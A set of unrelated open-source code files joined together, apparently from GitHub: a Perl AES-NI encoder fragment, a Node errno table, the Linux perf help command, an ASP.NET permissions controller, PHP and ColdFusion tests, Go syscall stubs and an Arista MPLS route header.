push @opcode,0xc0|($2&7)|(($3&7)<<3); # ModR/M
return ".byte\t".join(',',@opcode);
}
return $line;
}
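# For example, "aesenc %xmm1,%xmm0" is rewritten by the substitution below
# as ".byte 102,15,56,220,193", i.e. the 0x66 prefix, the 0x0f,0x38 escape,
# the 0xdc opcode and ModR/M 0xc0|src|(dst<<3), printed in decimal, so the
# module still assembles with assemblers that predate the AES-NI mnemonics.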
$code =~ s/\`([^\`]*)\`/eval($1)/gem;
$code =~ s/\b(aes.*%xmm[0-9]+).*$/aesni($1)/gem;
print $code;
close STDOUT;
var all = module.exports.all = [
{
errno: -2,
code: 'ENOENT',
description: 'no such file or directory'
},
{
errno: -1,
code: 'UNKNOWN',
description: 'unknown error'
},
{
errno: 0,
code: 'OK',
description: 'success'
},
{
errno: 1,
code: 'EOF',
description: 'end of file'
},
{
errno: 2,
code: 'EADDRINFO',
description: 'getaddrinfo error'
},
{
errno: 3,
code: 'EACCES',
description: 'permission denied'
},
{
errno: 4,
code: 'EAGAIN',
description: 'resource temporarily unavailable'
},
{
errno: 5,
code: 'EADDRINUSE',
description: 'address already in use'
},
{
errno: 6,
code: 'EADDRNOTAVAIL',
description: 'address not available'
},
{
errno: 7,
code: 'EAFNOSUPPORT',
description: 'address family not supported'
},
{
errno: 8,
code: 'EALREADY',
description: 'connection already in progress'
},
{
errno: 9,
code: 'EBADF',
description: 'bad file descriptor'
},
{
errno: 10,
code: 'EBUSY',
description: 'resource busy or locked'
},
{
errno: 11,
code: 'ECONNABORTED',
description: 'software caused connection abort'
},
{
errno: 12,
code: 'ECONNREFUSED',
description: 'connection refused'
},
{
errno: 13,
code: 'ECONNRESET',
description: 'connection reset by peer'
},
{
errno: 14,
code: 'EDESTADDRREQ',
description: 'destination address required'
},
{
errno: 15,
code: 'EFAULT',
description: 'bad address in system call argument'
},
{
errno: 16,
code: 'EHOSTUNREACH',
description: 'host is unreachable'
},
{
errno: 17,
code: 'EINTR',
description: 'interrupted system call'
},
{
errno: 18,
code: 'EINVAL',
description: 'invalid argument'
},
{
errno: 19,
code: 'EISCONN',
description: 'socket is already connected'
},
{
errno: 20,
code: 'EMFILE',
description: 'too many open files'
},
{
errno: 21,
code: 'EMSGSIZE',
description: 'message too long'
},
{
errno: 22,
code: 'ENETDOWN',
description: 'network is down'
},
{
errno: 23,
code: 'ENETUNREACH',
description: 'network is unreachable'
},
{
errno: 24,
code: 'ENFILE',
description: 'file table overflow'
},
{
errno: 25,
code: 'ENOBUFS',
description: 'no buffer space available'
},
{
errno: 26,
code: 'ENOMEM',
description: 'not enough memory'
},
{
errno: 27,
code: 'ENOTDIR',
description: 'not a directory'
},
{
errno: 28,
code: 'EISDIR',
description: 'illegal operation on a directory'
},
{
errno: 29,
code: 'ENONET',
description: 'machine is not on the network'
},
{
errno: 31,
code: 'ENOTCONN',
description: 'socket is not connected'
},
{
errno: 32,
code: 'ENOTSOCK',
description: 'socket operation on non-socket'
},
{
errno: 33,
code: 'ENOTSUP',
description: 'operation not supported on socket'
},
{
errno: 34,
code: 'ENOENT',
description: 'no such file or directory'
},
{
errno: 35,
code: 'ENOSYS',
description: 'function not implemented'
},
{
errno: 36,
code: 'EPIPE',
description: 'broken pipe'
},
{
errno: 37,
code: 'EPROTO',
description: 'protocol error'
},
{
errno: 38,
code: 'EPROTONOSUPPORT',
description: 'protocol not supported'
},
{
errno: 39,
code: 'EPROTOTYPE',
description: 'protocol wrong type for socket'
},
{
errno: 40,
code: 'ETIMEDOUT',
description: 'connection timed out'
},
{
errno: 41,
code: 'ECHARSET',
description: 'invalid Unicode character'
},
{
errno: 42,
code: 'EAIFAMNOSUPPORT',
description: 'address family for hostname not supported'
},
{
errno: 44,
code: 'EAISERVICE',
description: 'servname not supported for ai_socktype'
},
{
errno: 45,
code: 'EAISOCKTYPE',
description: 'ai_socktype not supported'
},
{
errno: 46,
code: 'ESHUTDOWN',
description: 'cannot send after transport endpoint shutdown'
},
{
errno: 47,
code: 'EEXIST',
description: 'file already exists'
},
{
errno: 48,
code: 'ESRCH',
description: 'no such process'
},
{
errno: 49,
code: 'ENAMETOOLONG',
description: 'name too long'
},
{
errno: 50,
code: 'EPERM',
description: 'operation not permitted'
},
{
errno: 51,
code: 'ELOOP',
description: 'too many symbolic links encountered'
},
{
errno: 52,
code: 'EXDEV',
description: 'cross-device link not permitted'
},
{
errno: 53,
code: 'ENOTEMPTY',
description: 'directory not empty'
},
{
errno: 54,
code: 'ENOSPC',
description: 'no space left on device'
},
{
errno: 55,
code: 'EIO',
description: 'i/o error'
},
{
errno: 56,
code: 'EROFS',
description: 'read-only file system'
},
{
errno: 57,
code: 'ENODEV',
description: 'no such device'
},
{
errno: 58,
code: 'ESPIPE',
description: 'invalid seek'
},
{
errno: 59,
code: 'ECANCELED',
description: 'operation canceled'
}
]
module.exports.errno = {}
module.exports.code = {}
all.forEach(function (error) {
module.exports.errno[error.errno] = error
module.exports.code[error.code] = error
})
module.exports.custom = require('./custom')(module.exports)
module.exports.create = module.exports.custom.createError
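
// Illustrative lookups (assuming this module is required as `errno`):
//   errno.code.ENOENT.description -> 'no such file or directory'
//   errno.errno[-2].code          -> 'ENOENT'
// module.exports.create is simply an alias for custom.createError from ./custom.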
openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
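# The command above generates a self-signed certificate: a fresh 2048-bit RSA
# key written unencrypted to key.pem (because of -nodes) and an X.509
# certificate valid for 3650 days written to cert.pem; openssl will prompt
# interactively for the subject fields.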
using System;
using System.Linq;
using System.Threading.Tasks;
using CoreDX.Application.EntityFrameworkCore;
using CoreDX.Domain.Entity.Permission;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.Rendering;
using Microsoft.EntityFrameworkCore;
namespace IdentityServer.Areas.Manage.Controllers
{
[Area("Manage")]
public class RolePermissionDeclarationController : Controller
{
private readonly ApplicationPermissionDbContext _permissionDbContext;
private readonly ApplicationIdentityDbContext _identityDbContext;
public RolePermissionDeclarationController(ApplicationPermissionDbContext permissionDbContext, ApplicationIdentityDbContext identityDbContext)
{
_permissionDbContext = permissionDbContext;
_identityDbContext = identityDbContext;
}
// GET: Manage/RolePermissionDeclaration
public async Task<IActionResult> Index()
{
var applicationIdentityDbContext = _permissionDbContext.RolePermissionDeclarations.Include(r => r.PermissionDefinition);
return View(await applicationIdentityDbContext.ToListAsync());
}
// GET: Manage/RolePermissionDeclaration/Details/5
public async Task<IActionResult> Details(int? permissionDefinitionId, int? roleId)
{
if (permissionDefinitionId == null || roleId == null)
{
return NotFound();
}
var rolePermissionDeclaration = await _permissionDbContext.RolePermissionDeclarations
.Include(r => r.PermissionDefinition)
.FirstOrDefaultAsync(m => m.PermissionDefinitionId == permissionDefinitionId && m.RoleId == roleId);
if (rolePermissionDeclaration == null)
{
return NotFound();
}
return View(rolePermissionDeclaration);
}
// GET: Manage/RolePermissionDeclaration/Create
public IActionResult Create()
{
ViewData["PermissionDefinition"] = new SelectList(_permissionDbContext.PermissionDefinitions, "Id", "Name");
ViewData["Role"] = new SelectList(_identityDbContext.Roles, "Id", "Name");
return View();
}
// POST: Manage/RolePermissionDeclaration/Create
        // To protect from overposting attacks, please enable the specific properties you want to bind to.
        // For more details, see http://go.microsoft.com/fwlink/?LinkId=317598.
[HttpPost]
[ValidateAntiForgeryToken]
public async Task<IActionResult> Create([Bind("RoleId,PermissionValue,PermissionDefinitionId,Id,Remark,OrderNumber,RowVersion,IsEnable,IsDeleted,CreationTime,LastModificationTime,CreatorId,LastModificationUserId")] RolePermissionDeclaration rolePermissionDeclaration)
{
if (ModelState.IsValid)
{
_permissionDbContext.Add(rolePermissionDeclaration);
await _permissionDbContext.SaveChangesAsync();
return RedirectToAction(nameof(Index));
}
ViewData["PermissionDefinition"] = new SelectList(_permissionDbContext.PermissionDefinitions, "Id", "Name", rolePermissionDeclaration.PermissionDefinitionId);
ViewData["Role"] = new SelectList(_identityDbContext.Roles, "Id", "Name", rolePermissionDeclaration.RoleId);
return View(rolePermissionDeclaration);
}
// GET: Manage/RolePermissionDeclaration/Edit/5
public async Task<IActionResult> Edit(Guid? id)
{
if (id == null)
{
return NotFound();
}
var rolePermissionDeclaration = await _permissionDbContext.RolePermissionDeclarations.FindAsync(id);
if (rolePermissionDeclaration == null)
{
return NotFound();
}
ViewData["PermissionDefinition"] = new SelectList(_permissionDbContext.PermissionDefinitions, "Id", "Name", rolePermissionDeclaration.PermissionDefinitionId);
ViewData["Role"] = new SelectList(_identityDbContext.Roles, "Id", "Name", rolePermissionDeclaration.RoleId);
return View(rolePermissionDeclaration);
}
// POST: Manage/RolePermissionDeclaration/Edit/5
        // To protect from overposting attacks, please enable the specific properties you want to bind to.
        // For more details, see http://go.microsoft.com/fwlink/?LinkId=317598.
[HttpPost]
[ValidateAntiForgeryToken]
public async Task<IActionResult> Edit(int permissionDefinitionId, [Bind("RoleId,PermissionValue,PermissionDefinitionId,Id,Remark,OrderNumber,RowVersion,IsEnable,IsDeleted,CreationTime,LastModificationTime,CreatorId,LastModificationUserId")] RolePermissionDeclaration rolePermissionDeclaration)
{
if (permissionDefinitionId != rolePermissionDeclaration.PermissionDefinitionId)
{
return NotFound();
}
if (ModelState.IsValid)
{
try
{
_permissionDbContext.Update(rolePermissionDeclaration);
await _permissionDbContext.SaveChangesAsync();
}
catch (DbUpdateConcurrencyException)
{
if (!RolePermissionDeclarationExists(rolePermissionDeclaration.PermissionDefinitionId))
{
return NotFound();
}
else
{
throw;
}
}
return RedirectToAction(nameof(Index));
}
ViewData["PermissionDefinition"] = new SelectList(_permissionDbContext.PermissionDefinitions, "Id", "Name", rolePermissionDeclaration.PermissionDefinitionId);
ViewData["Role"] = new SelectList(_identityDbContext.Roles, "Id", "Name", rolePermissionDeclaration.RoleId);
return View(rolePermissionDeclaration);
}
// GET: Manage/RolePermissionDeclaration/Delete/5
public async Task<IActionResult> Delete(int? id)
{
if (id == null)
{
return NotFound();
}
var rolePermissionDeclaration = await _permissionDbContext.RolePermissionDeclarations
.Include(r => r.PermissionDefinition)
.FirstOrDefaultAsync(m => m.PermissionDefinitionId == id);
if (rolePermissionDeclaration == null)
{
return NotFound();
}
return View(rolePermissionDeclaration);
}
// POST: Manage/RolePermissionDeclaration/Delete/5
[HttpPost, ActionName("Delete")]
[ValidateAntiForgeryToken]
public async Task<IActionResult> DeleteConfirmed(Guid id)
{
var rolePermissionDeclaration = await _permissionDbContext.RolePermissionDeclarations.FindAsync(id);
_permissionDbContext.RolePermissionDeclarations.Remove(rolePermissionDeclaration);
await _permissionDbContext.SaveChangesAsync();
return RedirectToAction(nameof(Index));
}
private bool RolePermissionDeclarationExists(int? id)
{
return _permissionDbContext.RolePermissionDeclarations.Any(e => e.PermissionDefinitionId == id);
}
}
}
/*
* builtin-help.c
*
* Builtin help command
*/
#include "perf.h"
#include "util/config.h"
#include "builtin.h"
#include <subcmd/exec-cmd.h>
#include "common-cmds.h"
#include <subcmd/parse-options.h>
#include <subcmd/run-command.h>
#include <subcmd/help.h>
#include "util/debug.h"
static struct man_viewer_list {
struct man_viewer_list *next;
char name[FLEX_ARRAY];
} *man_viewer_list;
static struct man_viewer_info_list {
struct man_viewer_info_list *next;
const char *info;
char name[FLEX_ARRAY];
} *man_viewer_info_list;
enum help_format {
HELP_FORMAT_NONE,
HELP_FORMAT_MAN,
HELP_FORMAT_INFO,
HELP_FORMAT_WEB,
};
static enum help_format parse_help_format(const char *format)
{
if (!strcmp(format, "man"))
return HELP_FORMAT_MAN;
if (!strcmp(format, "info"))
return HELP_FORMAT_INFO;
if (!strcmp(format, "web") || !strcmp(format, "html"))
return HELP_FORMAT_WEB;
pr_err("unrecognized help format '%s'", format);
return HELP_FORMAT_NONE;
}
static const char *get_man_viewer_info(const char *name)
{
struct man_viewer_info_list *viewer;
for (viewer = man_viewer_info_list; viewer; viewer = viewer->next) {
if (!strcasecmp(name, viewer->name))
return viewer->info;
}
return NULL;
}
static int check_emacsclient_version(void)
{
struct strbuf buffer = STRBUF_INIT;
struct child_process ec_process;
const char *argv_ec[] = { "emacsclient", "--version", NULL };
int version;
int ret = -1;
/* emacsclient prints its version number on stderr */
memset(&ec_process, 0, sizeof(ec_process));
ec_process.argv = argv_ec;
ec_process.err = -1;
ec_process.stdout_to_stderr = 1;
if (start_command(&ec_process)) {
fprintf(stderr, "Failed to start emacsclient.\n");
return -1;
}
if (strbuf_read(&buffer, ec_process.err, 20) < 0) {
fprintf(stderr, "Failed to read emacsclient version\n");
goto out;
}
close(ec_process.err);
/*
* Don't bother checking return value, because "emacsclient --version"
 * seems to always exit with code 1.
*/
finish_command(&ec_process);
if (prefixcmp(buffer.buf, "emacsclient")) {
fprintf(stderr, "Failed to parse emacsclient version.\n");
goto out;
}
version = atoi(buffer.buf + strlen("emacsclient"));
if (version < 22) {
fprintf(stderr,
"emacsclient version '%d' too old (< 22).\n",
version);
} else
ret = 0;
out:
strbuf_release(&buffer);
return ret;
}
static void exec_woman_emacs(const char *path, const char *page)
{
char sbuf[STRERR_BUFSIZE];
if (!check_emacsclient_version()) {
/* This works only with emacsclient version >= 22. */
char *man_page;
if (!path)
path = "emacsclient";
if (asprintf(&man_page, "(woman \"%s\")", page) > 0) {
execlp(path, "emacsclient", "-e", man_page, NULL);
free(man_page);
}
warning("failed to exec '%s': %s", path,
str_error_r(errno, sbuf, sizeof(sbuf)));
}
}
static void exec_man_konqueror(const char *path, const char *page)
{
const char *display = getenv("DISPLAY");
if (display && *display) {
char *man_page;
const char *filename = "kfmclient";
char sbuf[STRERR_BUFSIZE];
/* It's simpler to launch konqueror using kfmclient. */
if (path) {
const char *file = strrchr(path, '/');
if (file && !strcmp(file + 1, "konqueror")) {
char *new = strdup(path);
char *dest = strrchr(new, '/');
/* strlen("konqueror") == strlen("kfmclient") */
strcpy(dest + 1, "kfmclient");
path = new;
}
if (file)
filename = file;
} else
path = "kfmclient";
if (asprintf(&man_page, "man:%s(1)", page) > 0) {
execlp(path, filename, "newTab", man_page, NULL);
free(man_page);
}
warning("failed to exec '%s': %s", path,
str_error_r(errno, sbuf, sizeof(sbuf)));
}
}
static void exec_man_man(const char *path, const char *page)
{
char sbuf[STRERR_BUFSIZE];
if (!path)
path = "man";
execlp(path, "man", page, NULL);
warning("failed to exec '%s': %s", path,
str_error_r(errno, sbuf, sizeof(sbuf)));
}
static void exec_man_cmd(const char *cmd, const char *page)
{
char sbuf[STRERR_BUFSIZE];
char *shell_cmd;
if (asprintf(&shell_cmd, "%s %s", cmd, page) > 0) {
execl("/bin/sh", "sh", "-c", shell_cmd, NULL);
free(shell_cmd);
}
warning("failed to exec '%s': %s", cmd,
str_error_r(errno, sbuf, sizeof(sbuf)));
}
static void add_man_viewer(const char *name)
{
struct man_viewer_list **p = &man_viewer_list;
size_t len = strlen(name);
while (*p)
p = &((*p)->next);
*p = zalloc(sizeof(**p) + len + 1);
strncpy((*p)->name, name, len);
}
static int supported_man_viewer(const char *name, size_t len)
{
return (!strncasecmp("man", name, len) ||
!strncasecmp("woman", name, len) ||
!strncasecmp("konqueror", name, len));
}
static void do_add_man_viewer_info(const char *name,
size_t len,
const char *value)
{
struct man_viewer_info_list *new = zalloc(sizeof(*new) + len + 1);
strncpy(new->name, name, len);
new->info = strdup(value);
new->next = man_viewer_info_list;
man_viewer_info_list = new;
}
static int add_man_viewer_path(const char *name,
size_t len,
const char *value)
{
if (supported_man_viewer(name, len))
do_add_man_viewer_info(name, len, value);
else
warning("'%s': path for unsupported man viewer.\n"
"Please consider using 'man.<tool>.cmd' instead.",
name);
return 0;
}
static int add_man_viewer_cmd(const char *name,
size_t len,
const char *value)
{
if (supported_man_viewer(name, len))
warning("'%s': cmd for supported man viewer.\n"
"Please consider using 'man.<tool>.path' instead.",
name);
else
do_add_man_viewer_info(name, len, value);
return 0;
}
static int add_man_viewer_info(const char *var, const char *value)
{
const char *name = var + 4;
const char *subkey = strrchr(name, '.');
if (!subkey)
return error("Config with no key for man viewer: %s", name);
if (!strcmp(subkey, ".path")) {
if (!value)
return config_error_nonbool(var);
return add_man_viewer_path(name, subkey - name, value);
}
if (!strcmp(subkey, ".cmd")) {
if (!value)
return config_error_nonbool(var);
return add_man_viewer_cmd(name, subkey - name, value);
}
warning("'%s': unsupported man viewer sub key.", subkey);
return 0;
}
static int perf_help_config(const char *var, const char *value, void *cb)
{
enum help_format *help_formatp = cb;
if (!strcmp(var, "help.format")) {
if (!value)
return config_error_nonbool(var);
*help_formatp = parse_help_format(value);
if (*help_formatp == HELP_FORMAT_NONE)
return -1;
return 0;
}
if (!strcmp(var, "man.viewer")) {
if (!value)
return config_error_nonbool(var);
add_man_viewer(value);
return 0;
}
if (!prefixcmp(var, "man."))
return add_man_viewer_info(var, value);
return 0;
}
static struct cmdnames main_cmds, other_cmds;
void list_common_cmds_help(void)
{
unsigned int i, longest = 0;
for (i = 0; i < ARRAY_SIZE(common_cmds); i++) {
if (longest < strlen(common_cmds[i].name))
longest = strlen(common_cmds[i].name);
}
puts(" The most commonly used perf commands are:");
for (i = 0; i < ARRAY_SIZE(common_cmds); i++) {
printf(" %-*s ", longest, common_cmds[i].name);
puts(common_cmds[i].help);
}
}
static int is_perf_command(const char *s)
{
return is_in_cmdlist(&main_cmds, s) ||
is_in_cmdlist(&other_cmds, s);
}
static const char *cmd_to_page(const char *perf_cmd)
{
char *s;
if (!perf_cmd)
return "perf";
else if (!prefixcmp(perf_cmd, "perf"))
return perf_cmd;
return asprintf(&s, "perf-%s", perf_cmd) < 0 ? NULL : s;
}
static void setup_man_path(void)
{
char *new_path;
const char *old_path = getenv("MANPATH");
	/* We should always put ':' after our path. If there is no
	 * old_path, the ':' at the end lets 'man' try system-wide
	 * paths after ours to find the manual page. If there is an
	 * old_path, we need the ':' as a delimiter. */
if (asprintf(&new_path, "%s:%s", system_path(PERF_MAN_PATH), old_path ?: "") > 0) {
setenv("MANPATH", new_path, 1);
free(new_path);
} else {
error("Unable to setup man path");
}
}
static void exec_viewer(const char *name, const char *page)
{
const char *info = get_man_viewer_info(name);
if (!strcasecmp(name, "man"))
exec_man_man(info, page);
else if (!strcasecmp(name, "woman"))
exec_woman_emacs(info, page);
else if (!strcasecmp(name, "konqueror"))
exec_man_konqueror(info, page);
else if (info)
exec_man_cmd(info, page);
else
warning("'%s': unknown man viewer.", name);
}
static int show_man_page(const char *perf_cmd)
{
struct man_viewer_list *viewer;
const char *page = cmd_to_page(perf_cmd);
const char *fallback = getenv("PERF_MAN_VIEWER");
setup_man_path();
for (viewer = man_viewer_list; viewer; viewer = viewer->next)
exec_viewer(viewer->name, page); /* will return when unable */
if (fallback)
exec_viewer(fallback, page);
exec_viewer("man", page);
pr_err("no man viewer handled the request");
return -1;
}
static int show_info_page(const char *perf_cmd)
{
const char *page = cmd_to_page(perf_cmd);
setenv("INFOPATH", system_path(PERF_INFO_PATH), 1);
execlp("info", "info", "perfman", page, NULL);
return -1;
}
static int get_html_page_path(char **page_path, const char *page)
{
struct stat st;
const char *html_path = system_path(PERF_HTML_PATH);
/* Check that we have a perf documentation directory. */
if (stat(mkpath("%s/perf.html", html_path), &st)
|| !S_ISREG(st.st_mode)) {
pr_err("'%s': not a documentation directory.", html_path);
return -1;
}
return asprintf(page_path, "%s/%s.html", html_path, page);
}
/*
* If open_html is not defined in a platform-specific way (see for
* example compat/mingw.h), we use the script web--browse to display
* HTML.
*/
#ifndef open_html
static void open_html(const char *path)
{
execl_cmd("web--browse", "-c", "help.browser", path, NULL);
}
#endif
static int show_html_page(const char *perf_cmd)
{
const char *page = cmd_to_page(perf_cmd);
	char *page_path; /* it leaks but we exec below */
if (get_html_page_path(&page_path, page) < 0)
return -1;
open_html(page_path);
return 0;
}
int cmd_help(int argc, const char **argv, const char *prefix __maybe_unused)
{
bool show_all = false;
enum help_format help_format = HELP_FORMAT_MAN;
struct option builtin_help_options[] = {
OPT_BOOLEAN('a', "all", &show_all, "print all available commands"),
OPT_SET_UINT('m', "man", &help_format, "show man page", HELP_FORMAT_MAN),
OPT_SET_UINT('w', "web", &help_format, "show manual in web browser",
HELP_FORMAT_WEB),
OPT_SET_UINT('i', "info", &help_format, "show info page",
HELP_FORMAT_INFO),
OPT_END(),
};
const char * const builtin_help_subcommands[] = {
"buildid-cache", "buildid-list", "diff", "evlist", "help", "list",
"record", "report", "bench", "stat", "timechart", "top", "annotate",
"script", "sched", "kmem", "lock", "kvm", "test", "inject", "mem", "data",
#ifdef HAVE_LIBELF_SUPPORT
"probe",
#endif
#ifdef HAVE_LIBAUDIT_SUPPORT
"trace",
#endif
NULL };
const char *builtin_help_usage[] = {
"perf help [--all] [--man|--web|--info] [command]",
NULL
};
const char *alias;
int rc = 0;
load_command_list("perf-", &main_cmds, &other_cmds);
perf_config(perf_help_config, &help_format);
argc = parse_options_subcommand(argc, argv, builtin_help_options,
builtin_help_subcommands, builtin_help_usage, 0);
if (show_all) {
printf("\n Usage: %s\n\n", perf_usage_string);
list_commands("perf commands", &main_cmds, &other_cmds);
printf(" %s\n\n", perf_more_info_string);
return 0;
}
if (!argv[0]) {
printf("\n usage: %s\n\n", perf_usage_string);
list_common_cmds_help();
printf("\n %s\n\n", perf_more_info_string);
return 0;
}
alias = alias_lookup(argv[0]);
if (alias && !is_perf_command(argv[0])) {
printf("`perf %s' is aliased to `%s'\n", argv[0], alias);
return 0;
}
switch (help_format) {
case HELP_FORMAT_MAN:
rc = show_man_page(argv[0]);
break;
case HELP_FORMAT_INFO:
rc = show_info_page(argv[0]);
break;
case HELP_FORMAT_WEB:
rc = show_html_page(argv[0]);
break;
case HELP_FORMAT_NONE:
/* fall-through */
default:
rc = -1;
break;
}
return rc;
}
| {
"pile_set_name": "Github"
} |
<cfcomponent extends="taffy.core.resource" taffy:uri="/echo_regex/{id:\d{5}}">
<cffunction name="get">
<cfargument name="id" />
<cfset local.headers = {}/>
<cfset local.headers['x-dude'] = "dude!" />
<cfreturn representationOf(arguments).withStatus(999).withHeaders(local.headers) />
</cffunction>
<cffunction name="put">
<cfargument name="id" />
<cfreturn representationOf(arguments).withStatus(200) />
</cffunction>
<cffunction name="post">
<cfargument name="id" />
<cfreturn representationOf(arguments).withStatus(200) />
</cffunction>
<cffunction name="setDependency2">
<cfargument name="dependency2" />
<cfset this.dependency2 = arguments.dependency2 />
</cffunction>
</cfcomponent>
| {
"pile_set_name": "Github"
} |
<?php
namespace CacheTool\Proxy;
class PhpProxyTest extends ProxyTest
{
public function testGetFunctions()
{
$this->assertCount(8, $this->createProxyInstance()->getFunctions());
}
public function testFunctions()
{
$this->assertProxyCode("return extension_loaded('ext');", 'extension_loaded', ['ext']);
$this->assertProxyCode("return ini_get('var');", 'ini_get', ['var']);
$this->assertProxyCode("return ini_set('var', 'value');", 'ini_set', ['var', 'value']);
$this->assertProxyCode("return phpversion('php');", 'phpversion', ['php']);
$this->assertProxyCode("passthru", '_eval', ['passthru']);
$this->assertProxyCode('return realpath_cache_get();', 'stat_realpath_get', []);
$this->assertProxyCode('return realpath_cache_size();', 'stat_realpath_size', []);
$this->assertProxyCode('return clearstatcache(true);', 'stat_cache_clear', []);
}
protected function createProxyInstance()
{
return new PhpProxy();
}
}
| {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for 386, Darwin
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2019 Arista Networks, Inc. All rights reserved.
// Arista Networks, Inc. Confidential and Proprietary.
#ifndef EOS_INLINE_TYPES_MPLS_ROUTE_H
#define EOS_INLINE_TYPES_MPLS_ROUTE_H
namespace eos {
inline mpls_route_key_t::mpls_route_key_t() :
labels_(std::vector< mpls_label_t >{0}), metric_(0) {
}
inline mpls_route_key_t::mpls_route_key_t(mpls_label_t top_label,
mpls_route_metric_t metric) :
labels_(std::vector< mpls_label_t >{top_label}), metric_(metric) {
if (top_label.label() > (uint32_t)mpls_label_t::MAX) {
panic(invalid_mpls_label(top_label.label()));
}
}
inline mpls_route_key_t::mpls_route_key_t(std::vector<mpls_label_t> const & labels,
mpls_route_metric_t metric) :
labels_(labels), metric_(metric) {
for (auto label: labels) {
if (label.label() > (uint32_t)mpls_label_t::MAX) {
panic(invalid_mpls_label(label.label()));
}
}
}
inline std::vector<mpls_label_t> const &
mpls_route_key_t::labels() const {
return labels_;
}
inline void
mpls_route_key_t::labels_is(std::vector<mpls_label_t> const & labels) {
labels_ = labels;
}
inline void
mpls_route_key_t::label_set(uint32_t index, mpls_label_t const & value) {
labels_.insert(labels_.begin() + index, value);
}
inline void
mpls_route_key_t::label_del(uint32_t index) {
labels_.erase(labels_.begin() + index);
}
inline mpls_route_metric_t
mpls_route_key_t::metric() const {
return metric_;
}
inline void
mpls_route_key_t::metric_is(mpls_route_metric_t metric) {
metric_ = metric;
}
inline mpls_label_t
mpls_route_key_t::top_label() const {
if (labels_.empty()) {
return mpls_label_t();
} else {
return labels_.front();
}
}
inline void
mpls_route_key_t::top_label_is(mpls_label_t top_label) {
labels_ = std::vector< mpls_label_t > { top_label };
}
inline bool
mpls_route_key_t::operator==(mpls_route_key_t const & other) const {
return labels_ == other.labels_ &&
metric_ == other.metric_;
}
inline bool
mpls_route_key_t::operator!=(mpls_route_key_t const & other) const {
return !operator==(other);
}
inline bool
mpls_route_key_t::operator<(mpls_route_key_t const & other) const {
if(labels_ != other.labels_) {
return labels_ < other.labels_;
} else if(metric_ != other.metric_) {
return metric_ < other.metric_;
}
return false;
}
inline uint32_t
mpls_route_key_t::hash() const {
uint32_t ret = 0;
for (auto it=labels_.cbegin(); it!=labels_.cend(); ++it) {
ret = hash_mix::mix((uint8_t *)&(*it),
sizeof(mpls_label_t), ret);
}
ret = hash_mix::mix((uint8_t *)&metric_,
sizeof(mpls_route_metric_t), ret);
ret = hash_mix::final_mix(ret);
return ret;
}
inline std::string
mpls_route_key_t::to_string() const {
std::ostringstream ss;
ss << "mpls_route_key_t(";
ss << "labels=" <<"'";
bool first_labels = true;
for (auto it=labels_.cbegin(); it!=labels_.cend(); ++it) {
if (first_labels) {
ss << (*it);
first_labels = false;
} else {
ss << "," << (*it);
}
}
ss << "'";
ss << ", metric=" << metric_;
ss << ")";
return ss.str();
}
inline std::ostream&
operator<<(std::ostream& os, const mpls_route_key_t& obj) {
os << obj.to_string();
return os;
}
inline mpls_route_t::mpls_route_t() :
key_() {
}
inline mpls_route_t::mpls_route_t(mpls_route_key_t key) :
key_(key) {
}
inline mpls_route_key_t
mpls_route_t::key() const {
return key_;
}
inline void
mpls_route_t::key_is(mpls_route_key_t key) {
key_ = key;
}
inline bool
mpls_route_t::operator==(mpls_route_t const & other) const {
return key_ == other.key_;
}
inline bool
mpls_route_t::operator!=(mpls_route_t const & other) const {
return !operator==(other);
}
inline uint32_t
mpls_route_t::hash() const {
uint32_t ret = 0;
ret = hash_mix::mix((uint8_t *)&key_,
sizeof(mpls_route_key_t), ret);
ret = hash_mix::final_mix(ret);
return ret;
}
inline std::string
mpls_route_t::to_string() const {
std::ostringstream ss;
ss << "mpls_route_t(";
ss << "key=" << key_;
ss << ")";
return ss.str();
}
inline std::ostream&
operator<<(std::ostream& os, const mpls_route_t& obj) {
os << obj.to_string();
return os;
}
inline mpls_route_via_t::mpls_route_via_t() :
route_key_(), hop_(), intf_(), pushswap_label_(0),
label_action_(MPLS_ACTION_NULL), ttl_mode_(MPLS_TTLMODE_NULL),
payload_type_(MPLS_PAYLOAD_TYPE_NULL), skip_egress_acl_(false),
nexthop_group_() {
}
inline mpls_route_via_t::mpls_route_via_t(mpls_route_key_t route_key) :
route_key_(route_key), hop_(), intf_(), pushswap_label_(0),
label_action_(MPLS_ACTION_NULL), ttl_mode_(MPLS_TTLMODE_NULL),
payload_type_(MPLS_PAYLOAD_TYPE_NULL), skip_egress_acl_(false),
nexthop_group_() {
}
inline mpls_route_via_t::mpls_route_via_t(mpls_route_key_t route_key,
mpls_action_t label_action) :
route_key_(route_key), hop_(), intf_(), pushswap_label_(0),
label_action_(label_action), ttl_mode_(MPLS_TTLMODE_NULL),
payload_type_(MPLS_PAYLOAD_TYPE_NULL), skip_egress_acl_(false),
nexthop_group_() {
}
inline mpls_route_key_t
mpls_route_via_t::route_key() const {
return route_key_;
}
inline void
mpls_route_via_t::route_key_is(mpls_route_key_t route_key) {
route_key_ = route_key;
}
inline ip_addr_t
mpls_route_via_t::hop() const {
return hop_;
}
inline void
mpls_route_via_t::hop_is(ip_addr_t const & hop) {
hop_ = hop;
}
inline intf_id_t
mpls_route_via_t::intf() const {
return intf_;
}
inline void
mpls_route_via_t::intf_is(intf_id_t const & intf) {
intf_ = intf;
}
inline mpls_label_t
mpls_route_via_t::pushswap_label() const {
return pushswap_label_;
}
inline void
mpls_route_via_t::pushswap_label_is(mpls_label_t pushswap_label) {
pushswap_label_ = pushswap_label;
}
inline mpls_action_t
mpls_route_via_t::label_action() const {
return label_action_;
}
inline void
mpls_route_via_t::label_action_is(mpls_action_t label_action) {
label_action_ = label_action;
}
inline mpls_ttl_mode_t
mpls_route_via_t::ttl_mode() const {
return ttl_mode_;
}
inline void
